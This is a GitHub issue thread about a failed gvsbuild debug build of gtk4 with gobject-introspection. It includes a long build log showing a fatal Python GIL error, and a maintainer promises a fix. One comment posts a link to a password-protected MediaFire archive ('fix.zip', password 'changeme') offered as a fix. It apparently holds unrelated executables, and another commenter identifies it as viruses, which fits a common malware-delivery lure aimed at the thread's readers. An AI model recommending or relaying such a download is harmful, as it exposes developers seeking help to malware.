### ISSUE TITLE
build debug version of gtk4 with --enable-gi failed

### ISSUE THREAD

**Issue by tauruswang** [wingtk/gvsbuild#1451]
gvsbuild build --platform x64 --configuration debug --py-wheel --enable-gi  --build-dir D:\code_repository\gtk-build\debug gtk4

The python312_d.lib (debug version) can not be found by gvsbuild system.  I copy that file from C:\Python312\libs to  directory6 D:\code_repository\gtk-build\debug\gtk\x64\debug\lib manually. 

continue to build then shows the 

[35/89] Generating gir/gir-glib with a custom command (wrapped by meson to set PATH)
FAILED: gir/GLib-2.0.gir
"C:\Users\jswxz\pipx\venvs\gvsbuild\Scripts\python.exe" "D:\code_repository\gtk-build\debug\tools\meson-1.5.2\meson.py" "--internal" "exe" "--unpickle" "D:\code_repository\gtk-build\debug\build\x64\debug\gobject-introspection\_gvsbuild-meson\meson-private\meson_exe_python.exe_f8d39d0144ecbafcf2da425ad366a99548f8ab76.dat"
while executing ['C:\\Users\\jswxz\\pipx\\venvs\\gvsbuild\\Scripts\\python.exe', 'D:/code_repository/gtk-build/debug/build/x64/debug/gobject-introspection/_gvsbuild-meson/tools/g-ir-scanner', '--output=gir/GLib-2.0.gir', '--no-libtool', '--quiet', '--reparse-validate', '--add-include-path', 'D:/code_repository/gtk-build/debug/build/x64/debug/gobject-introspection/_gvsbuild-meson/gir', '--add-include-path', 'D:/code_repository/gtk-build/debug/build/x64/debug/gobject-introspection/gir', '--identifier-prefix=G', '--symbol-prefix=g', '--symbol-prefix=glib', '--c-include=glib.h', '--namespace=GLib', '--nsversion=2.0', '--library=glib-2.0', '--library=gobject-2.0', '--external-library', '--pkg=glib-2.0', '--cflags-begin', '-ID:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0', '-ID:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../lib/glib-2.0/include', '-utf-8', '-DGLIB_COMPILATION', '-DGOBJECT_COMPILATION', '-D__G_I18N_LIB_H__', '-DGETTEXT_PACKAGE=Dummy', '--cflags-end', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/gobject/gobject-visibility.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/gobject/glib-types.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../lib/glib-2.0/include/glibconfig.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/galloca.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/garray.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gasyncqueue.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gatomic.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gbacktrace.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gbase64.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gbitlock.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gbookmarkfile.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gbytes.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gcharset.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gchecksum.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gconvert.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gdataset.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gdate.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gdatetime.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gdir.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/genviron.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gerror.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gfileutils.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/ggettext.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/ghash.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/ghmac.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/ghook.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/ghostutils.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gi18n-lib.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gi18n.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/giochannel.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gkeyfile.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/glib-typeof.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/glib-visibility.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/glist.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gmacros.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gmain.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gmappedfile.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gmarkup.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gmem.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gmessages.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gnode.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/goption.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gpathbuf.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gpattern.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gpoll.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gprimes.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gprintf.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gqsort.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gquark.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gqueue.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/grand.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/grcbox.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/grefcount.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/grefstring.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gregex.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gscanner.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gsequence.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gshell.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gslice.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gslist.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gspawn.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gstdio.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gstrfuncs.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gstring.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gstringchunk.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gstrvbuilder.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gtestutils.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gthread.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gthreadpool.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gtimer.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gtimezone.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gtrashstack.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gtree.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gtypes.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gunicode.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/guri.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gutils.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/guuid.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gvariant.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gvarianttype.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gversion.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gversionmacros.h', 'D:/code_repository/gtk-build/debug/gtk/x64/debug/bin/../include/glib-2.0/glib/gwin32.h', '../gir/glib-2.0.c']
--- stdout ---

--- stderr ---
Fatal Python error: _PyInterpreterState_GET: the function must be called with the GIL held, after Python initialization and before Python finalization, but the GIL is released (the current Python thread state is NULL)
Python runtime state: unknown

ninja: build stopped: subcommand failed.
Traceback (most recent call last):
  File "D:\code_repository\gvsbuild\gvsbuild\utils\builder.py", line 540, in build
    if self.__build_one(p):
       ^^^^^^^^^^^^^^^^^^^
  File "D:\code_repository\gvsbuild\gvsbuild\utils\builder.py", line 676, in __build_one
    skip_deps = proj.build()
                ^^^^^^^^^^^^
  File "D:\code_repository\gvsbuild\gvsbuild\projects\gobject_introspection.py", line 62, in build
    Meson.build(
  File "D:\code_repository\gvsbuild\gvsbuild\utils\base_builders.py", line 56, in build
    self.builder.exec_ninja(params="install", working_dir=ninja_build)
  File "D:\code_repository\gvsbuild\gvsbuild\utils\builder.py", line 998, in exec_ninja
    self.__execute(
  File "D:\code_repository\gvsbuild\gvsbuild\utils\builder.py", line 1054, in __execute
    subprocess.check_call(args, cwd=working_dir, env=env, shell=True)
  File "C:\Python312\Lib\subprocess.py", line 413, in check_call
    raise CalledProcessError(retcode, cmd)
subprocess.CalledProcessError: Command 'ninja install' returned non-zero exit status 1.
Error: gobject-introspection build failed

**Comment by SagarChandra07** [comment]
install this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Pass: changeme
I put the necessary dlls in the archive

**Comment by tauruswang** [comment]
> install this https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file Pass: changeme I put the necessary dlls in the archive

what is that stuff ? x86_64-w64-ranlib.exe and x86_64-w64-ranlib.exe ?

**Comment by laomao0** [comment]
> > install this https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file Pass: changeme I put the necessary dlls in the archive
> 
> what is that stuff ? x86_64-w64-ranlib.exe and x86_64-w64-ranlib.exe ?

viruses

**Comment by DjLegolas** [comment]
@tauruswang I have encountered the same issues.
I will push a fix for the issue of not finding the `python3x_d.lib` file.
Regarding the second issue, it looks like a bug in upstream - will continue investigate.
